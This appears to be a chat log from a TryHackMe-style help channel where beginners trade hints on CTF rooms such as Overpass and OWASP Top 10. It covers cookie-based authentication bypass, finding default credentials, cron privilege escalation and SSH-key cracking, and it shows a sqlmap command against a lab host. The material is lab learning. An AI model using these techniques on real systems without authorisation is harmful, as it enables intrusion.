is it a bad habit if i always used pipe and grip after find to find certain files ? (because apparently i don't know how to use find properly)

stuck fractal
#

Yes

#

find / -iname "*someSubString*" 2>/dev/null is a really useful command to understand

sinful badger
valid rune
#

hmmmm ... yahh i don't seem to understand that who line you just wrote

#

that whole*

stuck fractal
#

@stuck fractal None of the answers/comments shown have a format of xxx.xxx.x.x that I need to answer the problem
@sinful badger Eh, I found various answers in there. And with a few google searches

#

@valid rune -iname is for case insensitive

odd panther
#

@stuck fractal also sorry for my attitude earlier.

stuck fractal
#

Apology accepted

glossy basin
#

aww, that's sweet

white salmon
#

@sinful badger Have you ever set up a network for your home or business before?

stuck fractal
#

I just realised how much of a hint I gave in the room text on Day 6

#

And a hint on the question

white salmon
#

That's assuming people actually read the room/task text

random thunder
#

any other hints for Overpass challenge ๐Ÿ˜

sinful badger
#

The answers seem to say these are the three ranges:
192.168.0.0 - 192.168.255.255
172.16.0.0 - 172.31.255.255
10.0.0.0 - 10.255.255.255

stuck fractal
#

Yep

sinful badger
#

Unless the answer is 192.168.x.x

stuck fractal
#

It's not asking for a range though

#

It's asking for a single network

sinful badger
#

second common private home range

stuck fractal
#

Ok well that's misleading but yeah

#

It's looking for a network

#

@inland onyx Could I get you to fix that on BP networking?

marble moat
#

Okay I think I'm just dumb then

stuck fractal
#

I mean it's fairly close to the first

sinful badger
#

192.168.x.x doesn't work when I put it in the answer though

white salmon
#

Yeah, that question is kinda weird

stuck fractal
#

192.168.x.x doesn't work when I put it in the answer though
@sinful badger Nope, because that's not how you denote a network

#

Typically, 192.168.x.0/24 is used, so only the last octet will change

#

So logically, the next one up from the answer before

sinful badger
#

192.168.x.0 does not seem to work either

white salmon
#

You're close- stop being too broad and be more specific

stuck fractal
#

Nope, because you put an x in there

#

That's not how you write a network, properly.

white salmon
#

I just wanted to say thanks to @odd panther and @stuck fractal for the hints in their convo about today's OWASP challange. For such an easy one, it took me down some weird paths. ๐Ÿ˜… Cheers!

#

It's asking for the second most common IP network configuration basically

sinful badger
#

@stuck fractal @white salmon Thanks, I got the answer now

white salmon
#

Awesome!

random thunder
#

any other hints for Overpass challenge ๐Ÿ˜

white salmon
#

Glad you found it :D

stuck fractal
#

any other hints for Overpass challenge ๐Ÿ˜
@random thunder Where have you got so far?

random thunder
#

@random thunder Where have you got so far?
@stuck fractal able to run the executable on my machine but unsure about the service parameter ๐Ÿ˜

stuck fractal
#

You created your own rabbit hole

#

Also, don't run random binaries on your own machine

#

Unless you've RE'd them

random thunder
#

Iam stuck and i have no clue where to proceed now

stuck fractal
#

It's an OWASP top 10 web vuln

#

That's in the hints

#

So maybe some more web enumeration would help you out here?

odd panther
#

@stuck fractal able to run the executable on my machine but unsure about the service parameter ๐Ÿ˜
@random thunder I thought that was actually a rabbit hole, I could not get any sense but also I am bad a RE on ELF

stuck fractal
#

I mean you're given the source code lol

odd panther
#

I don't know the language ๐Ÿ˜ฆ haha but your right I only need to learn more

stuck fractal
#

It's a rabbit hole, but one that you throw yourself into

#

It reads like most curly brace languages

keen willow
#

It reads like most curly brace languages
@stuck fractal here comes a new defenition, lol anidab

stuck fractal
keen willow
#

thought, you were talking abt ||.js|| isn't that ?

stuck fractal
#

No

#

But Go and JS are both curly brace languages

#

They have a similar structure

keen willow
#

fish, but thats fits on that too.

stuck fractal
#

here comes a new defenition, lol no idea what you mean tho

odd panther
#

I have to learn how to make a shell in go with the ability to upload and download files.. I don't know go.. so that will be fun

#

reverseshell sorry

stuck fractal
#

If it's for overpass, you really don't

odd panther
#

for Mcsi training

rapid flower
#

I searched about... ||fetch function|| anf the entire ||login.js|| appears to be the intended way for login... What is the loophole here

stuck fractal
#

It's an OWASP top 10 web vuln that's been covered in the first 3 days

valid bough
#

any hint for privesc on overpass?

stuck fractal
valid bough
#

tnx

random thunder
#

any hints on how to access the machine to run the code? @stuck fractal

odd panther
trim haven
#

dont @ james anyone can help you

stuck fractal
#

You're fixating on the code @random thunder

odd panther
#

Thank you to @merry helm r and @stuck fractal for the help

stuck fractal
#

Stop fixating on the code

random thunder
#

Okay.

valid rune
#

Flag 3 is located where bob's bash history gets stored. and Flag 4 is located where cron jobs are created. require privesc, right ?

white salmon
#

No

stuck fractal
#

404 users Nice

white salmon
#

@valid rune You have to find where these locations are, and then the flag.txt will be located inside of them.

stuck fractal
#

Or the flag will be text inside those files

valid rune
#

i tried with bob's bash history, but it required privs

#

same as crontabs .. they require privs

trim haven
#

They don't

#

You're looking in the wrong area

#

You can view the history by typing one word

valid rune
stuck fractal
#

Wrong place

plucky steppe
#

Hey everyone, I am stuck on Day 6 of OWASP Top 10 challenge. I have looked through the page source and found a comment ||js/cookie.js|| I tried to use ||github|| to look for the application name and also the javascript but could not find anything. I am not sure if I missed something or I overlooked it.

white salmon
#

Hey everyone, I am stuck on Day 6 of OWASP Top 10 challenge. I have looked through the page source and found a comment ||js/cookie.js|| I tried to use ||github|| to look for the application name and also the javascript but could not find anything. I am not sure if I missed something or I overlooked it.
@plucky steppe you were looking in the right place on one of those

rapid flower
#

Any alternative for sudo -l???

#

That does not ask me for a password

plucky steppe
#

@white salmon hmm interesting is the source code that the hint talk about for the ||js-cookie v3.0.0-beta.4||?

tropic flame
#

@rapid flower There's other tools you can use such as linpeas to enumerate for potential privilege escalation opportunities.

rapid flower
#

@rapid flower There's other tools you can use such as linpeas to enumerate for potential privilege escalation opportunities.
@tropic flame
Is that possible on ||overpass||

frank lagoon
#

Hello everyone! Can someone give me a hint? I am stuck at security configuration from the OWASP top 10 room

crystal saffron
#

@white salmon hmm interesting is the source code that the hint talk about for the ||js-cookie v3.0.0-beta.4||?
@plucky steppe I cloned this repo and I did not find any default credentials ๐Ÿ˜ฉ

tropic flame
#

@rapid flower yes, you would have to serve up a local server and use wget to get it, but it's not needed on Overpass.

rapid flower
#

Okay

#

Will look for some other way

frank lagoon
#

Anyone can that can help me?

white salmon
#

@frank lagoon Could you give a little more information about what you're stuck on and what you've done already?

#

@crystal saffron dont really want to reveal the ans in here. Theres a massive hint slightly earlier in this chat ๐Ÿ‘

frank lagoon
#

@white salmon sure

#

So I tried to look at the source code, found that it looks for a cookie with a value, I changed that value and the server tought that I was a user, it sent me to /mynotes/. I tried to create a note --> didn't work.

#

Tried directory bruteforcing, logging in via ssh with default creds, tried default creds on the web login form @white salmon

cedar coral
#

can i dm some one about overpass?

solemn smelt
#

no need for dm just send your question here

white salmon
#

You're looking in the wrong place @frank lagoon

buoyant grove
#

can i dm some one about overpass?
@cedar coral yeah

frank lagoon
#

Yep that's what I tought

#

I readed most of the js files

plucky steppe
#

I am very lost now I am still trying to look at ||github|| but cannot find anything that seems as a security misconfiguration

stuck fractal
#

The text in the OWASP room tells you exactly what the vulnerability is

frank lagoon
#

Am I looking at the right place? Path: /api/note/list

stuck fractal
#

Still no

buoyant grove
#

fork:can't allocate memory ๐Ÿ™‚ @stuck fractal

stuck fractal
#

Check the hint in the room

#

@buoyant grove Wasn't me.

buoyant grove
#

Overpass *

frank lagoon
#

I already did it

odd panther
#

@buoyant grove keep trying i had that, but wait in between

#

it will work for you

stuck fractal
#

@frank lagoon So you know from the hint in the room that you need to find the source code

buoyant grove
#

it will work for you
@odd panther okay thxx

frank lagoon
#

Yes from cookie.js?

stuck fractal
#

no

white salmon
#

Once you have the source code credentials are in plain text

stuck fractal
#

The source code

#

Not clientside JS

frank lagoon
#

How?

#

I can't find anything related to that app that is installed

plucky steppe
#

I think it is ||cookie.js|| am I right?

stuck fractal
#

No

#

Find the source code

#

It's an open source program

frank lagoon
#

Pensive notes?

plucky steppe
#

@white salmon use the double pipes

frank lagoon
#

Thanks MrRobot

white salmon
#

|| there is a place where people upload source code ||

buoyant grove
#

Lmao

frank lagoon
#

|| github? ||

odd panther
#

I finally get it, the other place to search, I see why you said the hint about indexing now...

rapid flower
#

@odd panther does that allow to prevent indexing from web searches?

plucky steppe
#

@frank lagoon I dont think its that

stuck fractal
#

No

#

Google just doesn't index everything

odd panther
#

This ^^

#

no cigar

#

for you

stuck fractal
#

What's a common website used to share source code for open source projects?

#

I'll keep giving out this hint

frank lagoon
#

Webserver hosts it?

stuck fractal
#

No

marble moat
#

Bitbucket?

stuck fractal
#

What's a common website used to share source code for open source projects?
@stuck fractal Literally this is all you need

odd panther
#

Bitbucket?
@marble moat that still a thing?

marble moat
#

๐Ÿ˜ญ๐Ÿ˜ญ

desert thorn
#

Thanks @stuck fractal for the hint -- fully agreed with what you said -- it's literally the only hint that's needed... ๐Ÿ™‚

tall rover
#

@stuck fractal Literally this is all you need
You can even put it like this into google ๐Ÿคฃ

stuck fractal
#

You need more than just google

#

But yeah

odd panther
#

I can learn from that, thank you. Its in golang!

tall rover
#

I meant your hint/question ๐Ÿ˜›

white salmon
#

Common website for source code for projects

frank lagoon
#

To download?

stuck fractal
#

To share.

frank lagoon
#

Does the domainname start with 'opensource'?

tall rover
#

@frank lagoon You're not gonna bruteforce-ask the domain name now are you? ๐Ÿคฃ

frank lagoon
#

Hahaha

#

Lol, google doesn't help

marble moat
#

Something to do with mit license?

odd panther
#

This is pain, I want to help you so bad but can't.. hammers etc haha

#

your all so close to ๐Ÿ˜ฆ

strong laurel
#

Thanks for the hint @stuck fractal

marble moat
#

This is pain, I want to help you so bad but can't.. hammers etc haha
@odd panther tried etc/shadow ๐Ÿ˜ญ๐Ÿ˜ญ๐Ÿ˜ญ

frank lagoon
#

|| Sourceforge? ||

odd panther
#

/etc/shadow never works for me ( i mean not been a good priv esc as usually locked down)

#

I'm sure there are ways tho

worn yew
#

Open source repo

stuck fractal
#

tried etc/shadow ๐Ÿ˜ญ๐Ÿ˜ญ๐Ÿ˜ญ
@marble moat Seriously, try some privesc enumeration scripts

#

Or check the room tags and the checklist I keep linking

frank lagoon
#

|| SourceRepo? ||

stuck fractal
#

You're thinking of tiny things

#

Think bigger

frank lagoon
#

Can you give another hint?

stuck fractal
#

No

#

I've given plenty of hints

worn yew
#

You try every answer posted here

#

Might find it

stuck fractal
worn yew
stuck fractal
#

Wait for a response

worn yew
#

Ok

tall rover
white salmon
#

@white salmon James just listed quite a lot
@tall rover just seen ๐Ÿ‘

frank lagoon
#

Source code hosting? || Assembla || If that was incorrect then I will try everything on that list (litle bruteforce)

stuck fractal
#

You need to put the work in yourself

#

You've used it before

frank lagoon
#

I will complete it later

strong laurel
#

@frank lagoon it is most likely the first place that comes to mind when talking bout opensource projects

frank lagoon
#

|| Github, gitlab, sourceforge ||

white salmon
#

Have a look around maybeยฏ_(ใƒ„)_/ยฏ

frank lagoon
#

Thanks, I think I got it

stuck fractal
#

@frank lagoon Maybe try searching on those platforms

#

Google doesn't index everything

marble moat
#

I got it

#

Maybe

odd panther
#

lol bout time ๐Ÿ™‚

#

Have been smashing my head on my desk your so close haha

marble moat
#

Okay I see salt values?? am I on tight track?@odd panther

stuck fractal
#

no

#

Read the documentation

#

Always read the documentation

marble moat
#

Ohhhh

#

Goddddddd

#

Dumb

#

Me

stuck fractal
marble moat
#

@stuck fractal thanks for pushing my brain man

#

Got it

stuck fractal
#

This was designed to be easy

#

Just people overcomplicate it

odd panther
#

I did overcomplicate it a lot.

toxic scarab
#

@stuck fractal I was slightly disappointed that you properly escaped all your SQL for Pensive Notes. I was hoping to find some Easter eggs. Of course, there is a good chance there were things to find and Iโ€™m just not bright enough to find anything. ๐Ÿ˜€

marble moat
#

@stuck fractal yesss it was easy, guess had a lot of red herring

odd panther
#

Its one of those tho, when searching and not knowing you try all and give up fast even when on the right track. I'm leaning now to keep going even after hours of enum, you WILL get it at some point.

stuck fractal
#

@toxic scarab There's nothing interesting on the DB

#

I just learnt with prepared statements, I don't know how to do it in a vulnerable way yet

lyric scarab
#

btw google indexed it just you have to remove the space

stuck fractal
#

Oh interesting, it indexed it because of my readme

#

nice

plucky steppe
#

Thanks for the help guys finally found it. You were right James, it was easy just overthought alot of it.

#

For sure a learning moment

cedar coral
#

omg got root on overpass

frank lagoon
#

Am I on the right path? I found a main.go file

stuck fractal
#

You need to read the docs

#

It's not got a hardcoded password

#

Hardcoded and default are slightly different

#

Hardcoded cannot be changed

frank lagoon
#

Thanks ninja

#

I think I found it

sterile robin
#

where are these documents

rapid flower
#

@frank lagoon not yet i guess

stuck fractal
#

The internet

odd panther
#

he we go again xD

#

haha

stuck fractal
#

@sterile robin Do your research and enumeration and you will find them

sterile robin
#

what web site

stuck fractal
#

Google works

#

Keep trying

frank lagoon
#

@rapid flower I found it

stuck fractal
#

What's a common website used to share source code for open source projects?

#

That's the hint

rapid flower
#

@frank lagoon you are talking about owasp or overpass?

stuck fractal
#

Don't spoil the room.

#

@rapid flower OWASP

frank lagoon
#

Ninja, the reason why it took so long to find it is because I didn't look.

#

Owasp

stuck fractal
#

Exactly

sterile robin
#

I didn't mean it sorry

stuck fractal
#

If you look, you will find it

rapid flower
#

Ohh my bad... I misunderstood

stuck fractal
#

But you have to look yourself

frank lagoon
#

I know, alot of people maybe misunderstood me and told me to look somewhere else then that platform

sterile robin
#

found it๐Ÿ˜‚ ๐Ÿ˜‚ ๐Ÿคฆโ€โ™‚๏ธ

odd panther
#

same just, I can't believe i missed the comment "check the documentation"

#

I so almost pasted the key here too.. lucky lol

#

must have better window arrangement

rapid flower
#

Some hint for privesc on overpass... Ran ||linpeas|| but nit able to figure out next step

stuck fractal
#

Look at your results

#

Look at what you can control

#

Look at the room tags

odd panther
#

Pentesting=Everything is hard until you know how. I spend so many hours on a task but when i get it, ahh its good. (usually simple too, after you know how), this sums up learning for me so far haha

white salmon
#

i'm looking for a hint or a push in the right direction for Task 18 SQL Injection of room CC:Pen Testing

#

i've ran sqlmap -u "http://{ip}/?id=1" --level=5 --risk=3

#

but I can't seem to get any useful information, it just shows testing info, and at the end it says all tested parameters do not appear to be injectable

#

my first question is to answer how many sqli vulnerabilities there are, but from the output i'm getting it seems like none, lol

stuck fractal
#

There's no parameter called id.

white salmon
#

doesn't sqlmap require there to be a parameter?

stuck fractal
#

Yes

#

But it's not id

white salmon
#

ohhhhh i think i know how to get it

#

is it the id located in the page source?

#

nevermind, looks like i can just run it with --forms

stuck fractal
#

You typically look at a request to find the parameter

#

Or see what the form is going to do

white salmon
#

ohhh, okay, that makes sense

sick sun
#

@odd panther hii bro can i pm you about overpass ?

waxen iron
#

the owasp challenge for today hint is to locate the app source code, i am not sure how to find out what this app is , i tried googling for 'pensive notes' and no results on github. Enumerated via dirb / nitko but no luck either. Any direction ? also tried a bunch of user/pw combos but not luck.

stuck fractal
#

Google without a space

#

But it's available quite easily

#

Google doesn't index everything

#

A website's own search feature will be better for results on that site

waxen iron
#

10-4 , that took all of 5 minutes, now taking my beginner level skills to Overpass and all the rabbits hole i have dug for myself

ivory kernel
#

How can I get output file on the remote host in meterpreter ? Any idea .

stuck fractal
#

That sounds like a question for google.

#

There's a nice meterpreter basics article out there

#

I recommend finding and reading it

ivory kernel
#

I checked .it .but I can't find ...
Ok .maybe I will give through reading..

white salmon
#

Room wonderland, I was user rabbit, teaParty binary is owned by root. I did ||enviroment variable privilege escalation ||on this binary by creating a fake date binary but I got hatter as user and not root?

stuck fractal
#

You can't possibly have searched everything. @ivory kernel

#

@white salmon time for you to learn about suid and some RE

#

Have you looked at the source code of the binary?

white salmon
#

I did strings only

#

Didn't re

stuck fractal
#

Eh, do some RE

#

Look at the system calls

white salmon
#

Oh I'll try

stuck fractal
#

That explains why

ivory kernel
#

@stuck fractal if this one is over .whole machine is over .jus stucked here .๐Ÿ˜…๐Ÿ˜…

stuck fractal
#

Or you can accept that I added a setuid(100Whatever) at the start of the program @white salmon

#

And that you can't get root from it

waxen iron
#

yes/no on overpass rabbit hole i m stuck in- is there sql injection on the admin form ? cause my sqlmap is not finidng any

stuck fractal
#

@ivory kernel I told you to go find the meterpreter basics. It's in there. Please remember rule 13. This is very easy to find via google.

#

@waxen iron No, it uses prepared statements so there's no possible SQLi.

white salmon
#

Yeah I added setuid(0). I'll read more about suid I think I need to get more clarity in it.

stuck fractal
#

It's already running as a different user

#

You can't change that

#

You managed to go one user up the chain

#

That's a good thing. Now keep going.

waxen iron
#

thanks @stuck fractal btw - for patiently answering everyones questions here.

stuck fractal
#

I made the room, so I can answer that question quickly

#

I also made wonderland, so that's quick to answer

#

I'm slowly taking over the platform and there's nothing you can do to stop me muhahaha

ivory kernel
#

@stuck fractal I searched it man ...
I got answer ...
One is download .and another one is spool .
But it's states that 3 letter word can fit in .? .

trim heath
#

Hey guys I need help with owasp top 10 room latest challenge. Can you give me any hint on security misconfiguration.

thorny nest
#

So finally rooted overpass. Thanks for the box @stuck fractal

ivory kernel
#

Lol yes yes

stuck fractal
#

I told you that this guide exists, and asked you to find it yourself and look at it.

ivory kernel
#

Man I fully went through that document I couldn't find answer ๐Ÿ˜ญ๐Ÿ˜ญ๐Ÿ˜ญ๐Ÿ˜ญ .
Can u pls say answer or otherwise show answer in that site @stuck fractal I'm sure I didn't missed anything .

stuck fractal
#

It's in there.

#

We do not give answers

#

Do your own research.

halcyon citrus
#

i too struck on that bro @ivory kernel

marble kiln
#

Any hint on Day 6, room owasptop10, find comment and try how fetch is working here for JSON
Atleast tell me, am I going wrong

stuck fractal
#

@marble kiln Read the material in the room, check the hint

#

You're not going to be able to hack in unless you know credentials

rapid flower
#

Any hints related ||cron|| in overpass?

stuck fractal
#

Work out what you can control and what you can't control

marble kiln
#

@stuck fractal reading source code from hours but couldn't see any credentials except a comment in js fiel๐Ÿฅบ๐Ÿ˜…

stuck fractal
#

It's not in JS

#

So have fun

#

The source code isn't the frontend code

#

Try harder. Do some research.

rapid flower
#

Overpass is not beginner level... Or is it?

stuck fractal
#

It is.

#

Upper end of beginner

#

It's not expected to be your first box

rapid flower
#

Then I surely need to go a long way

stuck fractal
#

You're expected to know privesc and enumeration

#

Run some privesc enumeration scripts

rapid flower
#

And it's my first... Atleast where things are relted to ||cron||

stuck fractal
#

Ok, so time for you to do some research into that

rapid flower
#

||gtfobins|| don't appear to be working over here

stuck fractal
#

Copy/paste from GTFOBins is boring

#

You have to actually understand what's going on.

rapid flower
#

Yup... Looking for ||cron|| privesc methids

stuck fractal
#

You won't get it until you actually understand what's going on

rapid flower
#

Ohkayyy

green sorrel
#

for jack do we have to bruteforce the wp-admin

rapid flower
#

๐Ÿ˜…

stuck fractal
#

@green sorrel try it and find out

green sorrel
#

I am

stuck fractal
#

If it takes more than 5 minutes, then either wrong user or you're not meant to

marble dagger
#

still stuck on overpass foothold. I try force to go somewhere. but it is a little tricky because I don't know where I actually want/can go. so I guess I'm again on the wrong path

cedar coral
#

@marble dagger dm me for help

random thunder
#

@marble dagger dm me for help
@cedar coral can i dm you for help?

cedar coral
#

Yes

autumn rivet
#

Anyone done with the Day 6 of OWASP room (Beginner)? I'm stuck there. I took the hint that I should go through the web app source code... It says maybe the documentation will mention default credentials.... I couldn't find any documentation. I went through all the html pages and it's .js scripts. The closest I've got to in the default values in main.js? Hint?

white salmon
#

You are looking at the frontend. Not the source code

autumn rivet
#

@white salmon so you mean to say it's not 'View Page Source' or curl?

white salmon
#

@white salmon so you mean to say it's not 'View Page Source' or curl?
@autumn rivet Yeah its not that.

random thunder
#

@autumn rivet Yeah its not that.
@white salmon Yes its actually not

#

Try to find the documentation for the code online. @autumn rivet

dense saddle
#

any hint on latest release of owasp top 10? security misconfiguration?

#

Checked all the source codes of the html pages, examined js files. Hint says to look in source code but there is nothing interesting there

#

even checked source code of ip/mynotes which is not accessible through browser

random thunder
#

any hint on latest release of owasp top 10? security misconfiguration?
@dense saddle Its not in the actual code but you have to check if the documentation exists for that code anywhere online. DM me if you need any further hints.

dense saddle
#

Ok Sundeep thanks

little idol
#

hi

#

on the overpass box, ||which software to use for authentication bypass||

rancid crystal
#

@little idol what exactly you are trying to bypass?

fast swan
#

@little idol Developer tools

little idol
#

@rancid crystal web site access on /admin

#

@fast swan i'm going to try

rancid crystal
#

Source code gives you the best hints

valid bough
#

Any hint to get root on overpass?
I feel stuck.

rancid crystal
#

@valid bough did you try linpeas?

final mortar
#

on the overpass box, ||which software to use for authentication bypass||
@little idol I used burp, you can use anything

sullen vine
#

i searched for source code and documentation
for Security Misconfiguration challenge of OWASP 10 i just found Go-IPFS and InfluxDB Code On Github but i didnt found any thing in docs

vernal goblet
#

Help me on Owasp top 10 challenge 6. I found the ||database file and the password hash but not able to crack it||

lyric scarab
#

you mean day 6? There only need to read the docs

fathom jolt
#

guys I'm just stucked at the overpass room I know that there is || a broken auth || but can't deal with it if some one could give me a nice hint it will be helpful ! โค๏ธ

white salmon
#

@vernal goblet|| you have to go on github||

vernal goblet
#

I found the ||GitHub page and got a database file with a password hash in it||

final mortar
#

I found the ||GitHub page and got a database file with a password hash in it||
@vernal goblet It's way easier

#

Maybe the documentation gives you default credentials that you can try.

#

Look for default creds

vernal goblet
#

Found it! I'm so dumb ๐Ÿ˜ถ

#

Thanks @final mortar

maiden violet
#

@final mortar ?

worthy iris
#

guys how would you privesc if you connected to a box via ssh rsa (and dont have any passwords so I cant sudo -l to find any NOPASSWD)

worn yew
#

Just read the github page and you see creds are lying around

hardy quest
#

@worn yew go-ifps-api github page?

worn yew
#

I'm referring to owasp 10 day 6 task

hardy quest
#

@worn yew me too... I can't find github page for pensive note taking app...

white salmon
#

there is also a plugin called || cookie editor|| you can use that too if you are lazy to turn on burp

worn yew
#

It is there

white salmon
#

@worn yew don't share answers

worn yew
#

ok

little idol
#

find a way with cookies editor

#

for ||overpass||

storm condor
#

@worn yew me too... I can't find github page for pensive note taking app...
@hardy quest a little search can help you

turbid spruce
#

@worn yew If it may help to find it at first try, play with spaces

north moat
#

i got root OverPass ๐Ÿ™‚

solid cave
#

@north moat Me too - 'grats (my root was about 2 mins after user - which took me hours to foothold... duh)

random thunder
#

i got root OverPass ๐Ÿ™‚
@north moat any hints?

north moat
#

yeh root Less time than user.txt ๐Ÿ™‚

keen willow
#

@worn yew me too... I can't find github page for pensive note taking app...
@hardy quest you may want to use ||github's search|| rather then ||google's||

solid cave
#

@random thunder - if overpass was any more spelt out than it was already ^^above^^ - it would be a walkthru ๐Ÿ™‚

hardy quest
#

@keen willow thanks bro! After your hint I directly found it ๐Ÿ˜โœŒ๐Ÿป

strange tundra
#

can i get a hint about overpass ?

green sorrel
#

just use the search bar

#

u'll find heaps

final mortar
#

i got root OverPass ๐Ÿ™‚
@north moat I mean it's an easy rated room after all kekw

north moat
#

@final mortar is it easy ?

little idol
#

root overpass just now !!!!

north moat
#

good job ๐Ÿ™‚

sick sun
#

@little idol hii bro can i pm you about overpass ?

keen willow
#

@sick sun you can scroll up till today's msgs, there are a lot of hints for overpass.

crisp wigeon
#

hi guys, rockyou will work to crack overpass key

hollow gazelle
#

yes

jade rampart
#

Thanks for the hints @worn yew , @final mortar , @vernal goblet ,
It helped me alot!
I have a question though,
How'd you figure out that you had to go to some Github page?

stuck fractal
#

Where else would you go?

#

Some googling will take you to that page

#

The hint tells you to find the source code

jade rampart
#

Where else would you go?
@stuck fractal Whaoh! that's your github repo right? Awesome!

#

The hint tells you to find the source code
@stuck fractal I was of the view that I'd try looking at inspect element to find something

stuck fractal
#

That's not the sourcecode for the webapp

jade rampart
#

That's not the sourcecode for the webapp
@stuck fractal okay, okay
Got it

#

Sorry, beginner's mistake

#

Thanks alot though!
Really appreciate your web app

stuck fractal
#

Don't use it in production

graceful plinth
#

@stuck fractal okay, okay
Got it
@jade rampart can you give some hints been looking for about one and half hour

stuck fractal
#

I have

#

Many many many hints

#

On the task text, and in here

#

hi guys, rockyou will work to crack overpass key
@crisp wigeon On tryhackme, you use rockyou unless you're told to use something else.

crisp wigeon
#

@stuck fractal thanks then i have some problem...

stuck fractal
#

Probably.

crisp wigeon
#

Shall i DM ?

stuck fractal
#

No

#

You shall not.

crisp wigeon
#

Okay ..

median compass
#

just ask your question here @crisp wigeon, that's what the channel is for. If you're afraid that you have spoliers then just surround them in || marks

crisp wigeon
#

Sure ..

#

I tried cracked so many times but only one time it showed cracked and give passwd with this string ||em****d|| again tried nothing worked .. need to confirm this also ..

median compass
#

so, it's double | for spoilers

crisp wigeon
#

Yep

median compass
#

i.e. || before and after

#

not what you did

#

there you go!

maiden moss
#

||text||

crisp wigeon
#

Thanks @median compass @maiden moss

maiden moss
#

๐Ÿ‘

median compass
#

so you want to confirm what? that you got the right passphrase?

crisp wigeon
#

I got the key and i tried to crack with John ..it's not working and at random time, only one time i got this ||em****d|| string ..

stuck fractal
#

Did you use ssh2john first?

crisp wigeon
#

No,,

stuck fractal
#

Well then you're not cracking it properly

crisp wigeon
#

Let me do it then ..

median compass
#

you need to make a hash first that John can work with

#

on kali that's /usr/share/john/ssh2john.py

crisp wigeon
#

Yep will do .. thanks @median compass @stuck fractal

median compass
#

happy hunting

jade rampart
#

@jade rampart can you give some hints been looking for about one and half hour
@graceful plinth Any progress? or may I give a hint?

stuck fractal
#

Check the room tags, run some enum scripts

graceful plinth
#

@graceful plinth Any progress? or may I give a hint?
@jade rampart came up with github searches

#

got the password hash and salt too

stuck fractal
#

That won't help you

#

You don't need to download anything. There's your hint.

graceful plinth
#

okay

#

got it

#

thanks ๐Ÿ˜„

wanton epoch
#

any hints for root on retro? priv esc for windows is a challenge for me ๐Ÿ˜ฆ

trim haven
#

Let me just check the room to refresh myself 2 seconds

wanton epoch
#

thanks @trim haven !

trim haven
#

Have you tried uploading winpeas or other tools that will looks for ways of privilege escalation??

wanton epoch
#

yup

#

gone through all the output but cant seem to find any attack vectors

#

maybe i just dont know what things to look for specifically?

trim haven
#

Personally I havenโ€™t used winpeas, I have used linpeas so Iโ€™m unsure if it was the same colour-scheme style